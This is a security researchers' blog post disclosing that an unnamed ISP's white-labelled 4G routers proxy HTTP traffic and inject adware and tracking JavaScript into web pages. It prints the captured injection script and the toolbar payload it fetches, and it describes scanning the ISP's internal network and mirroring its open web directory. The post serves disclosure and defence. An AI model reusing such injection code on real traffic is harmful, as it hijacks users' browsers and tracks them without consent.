Chinese Adware spreading with Fruit ISP in the middle east

Cybersecurity fruit spaceman

Summary:

During a recent visit to a certain Arabic-speaking country, part
of Firo Solution’s Team discovered an HTTP script injection that affected

every mobile 4g router, by the current market leader “Fruit ISP”.

Further investigation showed that all HTTP requests were sent
to a proxy that injected a malicious javascript into HTTP payloads. A malicious attack to spread adware and inject tracking scripts into the user’s browsers.

This article covers the findings of how consumer routers are routing traffic in

a malicious way. Our malicious internet service provider “Fruit ISP” injects
malicious javascript into all HTTP user packages.

In a distant Arabic-speaking country, far away.

Part of our team suspected that something was up with the 4g mobile routers that the majority of the people were using. These are white-labeled Chinese-made “4g
mobile routers” being resold under Fruit’s name. When one of our team members
used the tool “curl” to talk to an HTTP site, the payload returned contained
more than what was hosted on that website. The payload contained

a modified HTTP request, where a javascript was injected in the body tag. In HTML, the body tag contains the majority of the graphical structure

for your interface. An additional javascript import to the body tag is nothing
that the end user would notice firsthand.

The script was hosted by an internal computer on a “10.X” internal address. This raised our eyebrows as our computers were on the same internal network but on a
192.168.X address. After discovering this new network we started scanning for
other hosts, we had the IP address of this new suspicious host acting as a
proxy.

HTTP Injection

Connecting to a real internet-facing site over HTTP:

hacker@lotus:~/computers$ curl -v http://<SITE REDACTED>/index.html

*   Trying ip:80...

* Connected to <>.com (IP) port 80 (#010.60.117.196:8888)

> GET /index.html HTTP/1.1

> Host: <>.com

> User-Agent: curl/7.74.0

> Accept: */*

> 

< HTTP/1.1 200 OK

< Content-Type: text/html

< Connection: keep-alive

< 

<html>


<head>

<title>REMOVED</title>

</head>


<body>


<div>

<center>

<h3>Site is under construction</h3>


REMOVED



</div>


</body>


</html>

<script id="__123__ddasdf_33" type="text/javascript"></script>

<script type="text/javascript"><!--

(function() {

    if (top != this ) return;

    if (document.title.length == 0){return;}

    var divs = document.getElementsByTagName("div");

    if (divs.length == 0){return;}    

    if(document.__123__ddasdf_33 != null) {return;}

    document.__123__ddasdf_33 = "_123";

    var e = document.getElementById("__123__ddasdf_33");

    var url = "http://10.60.117.196:8888/fc/toolbarzz.js";

    var getTimestamp = new Date().getTime();

    if (url.indexOf("?")>0){url=url+

"&timestamp="+getTimestamp;}else{url=url+"?timestamp="+getTimestamp;}

    e.setAttribute("src", url);

})();

* Connection #0 to host <>.com left intact

--></script>

What is the host “10.60.117.196:8888” trying to inject into our HTTP request?

Further output:


<script id="__123__ddasdf_33" type="text/javascript"></script>

<script type="text/javascript"><!--

(function() {

    if (top != this ) return;

    if (document.title.length == 0){return;}

    var divs = document.getElementsByTagName("div");

    if (divs.length == 0){return;}    

    if(document.__123__ddasdf_33 != null) {return;}

    document.__123__ddasdf_33 = "_123";

    var e = document.getElementById("__123__ddasdf_33");

    var url = "http://10.60.117.196:8888/fc/toolbarzz.js";

    var getTimestamp = new Date().getTime();

    if (url.indexOf("?")>0){url=url+"&timestamp="+getTimestamp;}else{url=url+"?timestamp="+getTimestamp;}

    e.setAttribute("src", url);

})();

* Connection #0 to host REDACTED .com left intact

--></script>

http://10.60.117.196:8888/fc/toolbarzz.jstoolbarzz.js

*   Trying 10.60.117.196:8888...

* Connected to 10.60.117.196 (10.60.117.196) port 8888 (#0)

> GET /fc/toolbarzz.js HTTP/1.1

> Host: 10.60.117.196:8888

> User-Agent: curl/7.74.0

> Accept: */*

> 

* Mark bundle as not supporting multiuse

< HTTP/1.1 200 OK

< Date: Sat, 24 Sep 2022 14:24:48 GMT

< Server: Apache/2.2.15 (CentOS)

< X-Powered-By: PHP/5.3.3

< Vary: Accept-Encoding

< Content-Length: 950

< Connection: close

< Content-Type: text/javascript; charset=utf-8

< Set-Cookie: SERVERID=server01; path=/

< Cache-control: private

< 

window["$$$wins_pm"] = { "bUrl": "http://10.60.117.196:8888","tUrl": "http://10.60.117.196:8888/tb/ajtb/20181118b","p1":"0_637551301","mdn":"201282672637","pid":"128","uid":"q__F%5D%5CB%1AFOCR","pp":"/tb/ajtb/20181118b","pt":"20220924141931","pd":""};var wins_head=document.getElementsByTagName("head")[0];var wins_body=document.getElementsByTagName("body")[0];var wins_div=document.createElement("div");function wins_add_css(href){var wins_css = document.createElement("link");wins_css.type="text/css";wins_css.rel="stylesheet";wins_css.href=href;wins_head.appendChild(wins_css)}wins_add_css($$$wins_pm.tUrl+"/toolbar.css");wins_add_css($$$wins_pm.tUrl+"/query.css");wins_div.id="wins_toolbar";wins_div.css="wins_toolbar";wins_div.className="wins_toolbar";var tbFrist=wins_body.childNodes[0]; wins_body.insertBefore(wins_div,tbFrist); wins_js=document.createElement("script");wins_js.src=$$$wins_pm.tUrl+"/query.js";wins_head.appendChild(wins_js);


* Closing connection 0


Further Network Exploration

We kept poking on the 10.60.X network and found several hosts, one of which we suspect is a firewall/ids, two unusual centos instances, and around 25 other hosts. Something we noticed was that when an IP scan was issued we were automatically blocked from talking with the other internal hosts for 1-2 minutes.

Data dump

We found out that the person who was in charge
of hosting this adware had allowed directory
listing on the web server so we could download
parts of the hosted content with a simple “wget -r”.
Here is a link to the data we downloaded:

ipfs link to download zip file:
https://ipfs.io/ipfs/QmZEwyZi5hGxP7D6UhgyFXjwkpvFj43X6ZJpgUWYJtLNt2?filename=10.zip

File hash:

$ md5sum 10.zip
ccc1ecbf9addfdb0bee89a9f994fa463  10.zip
$ b2sum 10.zip
29ece073e733614f4a68cb9d71b7bc11513887cbe95514a945772ca679cefd2663e97ad2a662273225d98cd6acbd25df01d48814b93d3df7a288729137b8f1bb  10.zip



We have reached out to the Internet Service Provider, and even doe the ISP has a large Cyber Security Department, we have not heard any feedback. Therefore as security researchers, we have chosen to publish a data dump hosted by the http proxy our "Fruit ISP" is running.  Since 8 months have passed without any useful feedback, we decided to publish our findings. 



To Fruit ISP:

We are more than happy to provide more information, affected IP ranges, and further information. Firo Solutions LTD has no intention of giving out any personally identifiable information and will not disclose further information regarding the affected ISP. 



"Fruit ISP" is not a real name. Yes, we have to write this.   


  
### External Links:  
https://cwe.mitre.org/data/definitions/548.html
https://en.wikipedia.org/wiki/HTTP_header_injection